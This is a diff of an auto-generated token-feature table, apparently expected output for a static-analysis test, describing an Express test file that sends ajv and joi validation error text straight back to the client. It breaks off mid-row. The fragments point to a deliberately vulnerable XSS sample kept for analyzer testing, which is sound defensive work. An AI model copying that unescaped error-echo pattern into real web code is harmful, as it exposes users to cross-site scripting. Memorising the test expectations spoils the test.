autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:31 | ajv.errorsText | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:31 | ajv.errorsText | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | ajv.errorsText() | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | ajv.errorsText() | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | ajv.errorsText() | contextFunctionInterfaces | | @@ -18721,18 +127282,119 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | ajv.errorsText() | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | ajv.errorsText() | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | ajv.errorsText() | receiverName | res | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | exceptional return of ajv.errorsText() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | exceptional return of ajv.errorsText() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | exceptional return of ajv.errorsText() | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | exceptional return of ajv.errorsText() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:18:11:33 | exceptional return of ajv.errorsText() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:11:22:11:31 | errorsText | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:11:22:11:31 | errorsText | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:11:22:11:31 | errorsText | enclosingFunctionBody | req res ajv validate pollData req body res send ajv errorsText | +| autogenerated/Xss/ExceptionXss/ajv.js:11:22:11:31 | errorsText | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:11:22:11:31 | errorsText | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:9 | joi | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:9 | joi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:9 | joi | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:26 | joi | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:26 | joi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:26 | joi | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:26 | joi = require("joi") | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:26 | joi = require("joi") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:7:15:26 | joi = require("joi") | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:19 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:19 | require | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:26 | exceptional return of require("joi") | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:26 | exceptional return of require("joi") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:26 | exceptional return of require("joi") | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:26 | require("joi") | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:26 | require("joi") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:15:13:15:26 | require("joi") | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:15:21:15:25 | "joi" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ExceptionXss/ajv.js:15:21:15:25 | "joi" | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/ajv.js:15:21:15:25 | "joi" | calleeImports | | | autogenerated/Xss/ExceptionXss/ajv.js:15:21:15:25 | "joi" | contextFunctionInterfaces | | | autogenerated/Xss/ExceptionXss/ajv.js:15:21:15:25 | "joi" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:15:21:15:25 | "joi" | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:16:15 | joiSchema | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:16:15 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:16:15 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:16:15 | joiSchema | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:19:22 | joiSche ... 'age') | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:19:22 | joiSche ... 'age') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:19:22 | joiSche ... 'age') | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:19:22 | joiSchema | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:19:22 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:7:19:22 | joiSchema | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:21 | joi | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:21 | joi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:21 | joi | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:28 | joi.object | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:28 | joi.object | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:28 | joi.object | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:30 | exceptional return of joi.object() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:30 | exceptional return of joi.object() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:30 | exceptional return of joi.object() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:30 | joi.object() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:30 | joi.object() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:30 | joi.object() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:35 | joi.object().keys | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:35 | joi.object().keys | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:16:35 | joi.object().keys | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:2 | exceptional return of joi.obj ... ed()\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:2 | exceptional return of joi.obj ... ed()\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:2 | exceptional return of joi.obj ... ed()\\n}) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:2 | joi.obj ... ed()\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:2 | joi.obj ... ed()\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:2 | joi.obj ... ed()\\n}) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:7 | joi.obj ... }).with | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:7 | joi.obj ... }).with | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:7 | joi.obj ... }).with | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:22 | exceptional return of joi.obj ... 'age') | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:22 | exceptional return of joi.obj ... 'age') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:22 | exceptional return of joi.obj ... 'age') | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:22 | joi.obj ... 'age') | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:22 | joi.obj ... 'age') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:19:19:22 | joi.obj ... 'age') | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:23:16:28 | object | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:23:16:28 | object | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:23:16:28 | object | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:16:32:16:35 | keys | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:32:16:35 | keys | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:16:32:16:35 | keys | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:16:37:19:1 | {\\n n ... red()\\n} | CalleeFlexibleAccessPath | joi.object().keys | | autogenerated/Xss/ExceptionXss/ajv.js:16:37:19:1 | {\\n n ... red()\\n} | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/ajv.js:16:37:19:1 | {\\n n ... red()\\n} | calleeImports | joi | | autogenerated/Xss/ExceptionXss/ajv.js:16:37:19:1 | {\\n n ... red()\\n} | contextFunctionInterfaces | | | autogenerated/Xss/ExceptionXss/ajv.js:16:37:19:1 | {\\n n ... red()\\n} | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:16:37:19:1 | {\\n n ... red()\\n} | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:8 | name | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:8 | name | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:8 | name | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:33 | name: j ... uired() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:33 | name: j ... uired() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:33 | name: j ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:33 | name: j ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:33 | name: j ... uired() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:5:17:33 | name: j ... uired() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:13 | joi | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:13 | joi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:13 | joi | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:20 | joi.string | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:20 | joi.string | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:20 | joi.string | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:22 | exceptional return of joi.string() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:22 | exceptional return of joi.string() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:22 | exceptional return of joi.string() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:22 | joi.string() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:22 | joi.string() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:22 | joi.string() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:31 | joi.str ... equired | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:31 | joi.str ... equired | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:31 | joi.str ... equired | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | exceptional return of joi.str ... uired() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | exceptional return of joi.str ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | exceptional return of joi.str ... uired() | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | joi.str ... uired() | CalleeFlexibleAccessPath | joi.object().keys | | autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | joi.str ... uired() | InputAccessPathFromCallee | 0.name | | autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | joi.str ... uired() | InputArgumentIndex | 0 | @@ -18741,6 +127403,39 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | joi.str ... uired() | contextFunctionInterfaces | | | autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | joi.str ... uired() | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:17:11:17:33 | joi.str ... uired() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:15:17:20 | string | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:15:17:20 | string | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:15:17:20 | string | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:17:24:17:31 | required | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:24:17:31 | required | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:17:24:17:31 | required | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:7 | age | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:7 | age | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:7 | age | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:32 | age: jo ... uired() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:32 | age: jo ... uired() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:32 | age: jo ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:32 | age: jo ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:32 | age: jo ... uired() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:5:18:32 | age: jo ... uired() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:12 | joi | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:12 | joi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:12 | joi | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:19 | joi.number | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:19 | joi.number | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:19 | joi.number | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:21 | exceptional return of joi.number() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:21 | exceptional return of joi.number() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:21 | exceptional return of joi.number() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:21 | joi.number() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:21 | joi.number() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:21 | joi.number() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:30 | joi.num ... equired | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:30 | joi.num ... equired | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:30 | joi.num ... equired | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | exceptional return of joi.num ... uired() | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | exceptional return of joi.num ... uired() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | exceptional return of joi.num ... uired() | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | joi.num ... uired() | CalleeFlexibleAccessPath | joi.object().keys | | autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | joi.num ... uired() | InputAccessPathFromCallee | 0.age | | autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | joi.num ... uired() | InputArgumentIndex | 0 | @@ -18749,6 +127444,15 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | joi.num ... uired() | contextFunctionInterfaces | | | autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | joi.num ... uired() | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:18:10:18:32 | joi.num ... uired() | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:14:18:19 | number | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:14:18:19 | number | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:14:18:19 | number | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:18:23:18:30 | required | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:23:18:30 | required | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:18:23:18:30 | required | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:19:4:19:7 | with | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:19:4:19:7 | with | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:19:4:19:7 | with | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:19:9:19:14 | 'name' | CalleeFlexibleAccessPath | joi.object().keys().with | | autogenerated/Xss/ExceptionXss/ajv.js:19:9:19:14 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/ajv.js:19:9:19:14 | 'name' | calleeImports | joi | @@ -18761,6 +127465,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:19:17:19:21 | 'age' | contextFunctionInterfaces | | | autogenerated/Xss/ExceptionXss/ajv.js:19:17:19:21 | 'age' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:19:17:19:21 | 'age' | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:21:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:21:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:21:3 | app | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:21:8 | app.post | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:21:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:21:8 | app.post | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:26:2 | app.pos ... }\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:26:2 | app.pos ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:26:2 | app.pos ... }\\n}) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:26:2 | exceptional return of app.pos ... }\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:26:2 | exceptional return of app.pos ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:1:26:2 | exceptional return of app.pos ... }\\n}) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:5:21:8 | post | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:5:21:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:5:21:8 | post | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:21:10:21:20 | '/votedata' | CalleeFlexibleAccessPath | app.post | | autogenerated/Xss/ExceptionXss/ajv.js:21:10:21:20 | '/votedata' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/ajv.js:21:10:21:20 | '/votedata' | calleeImports | express | @@ -18768,6 +127487,16 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:21:10:21:20 | '/votedata' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/ajv.js:21:10:21:20 | '/votedata' | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:21:10:21:20 | '/votedata' | receiverName | app | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:21:22 | joiSchema | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:21:22 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:21:22 | joiSchema | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:21:22 | joiSchema | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:21:22 | joiSchema | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | 'arguments' object of anonymous function | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | (req, r ... }\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | (req, r ... }\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | (req, r ... }\\n} | calleeImports | express | @@ -18775,6 +127504,131 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | (req, r ... }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | (req, r ... }\\n} | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | (req, r ... }\\n} | receiverName | app | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | exceptional return of anonymous function | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | exceptional return of anonymous function | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | return of anonymous function | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:21:23:26:1 | return of anonymous function | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:24:21:26 | req | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:21:29:21:31 | res | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:13 | val | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:13 | val | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:13 | val | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:13 | val | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:13 | val | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val = j ... q.body) | contextFunctionInterfaces | | +| 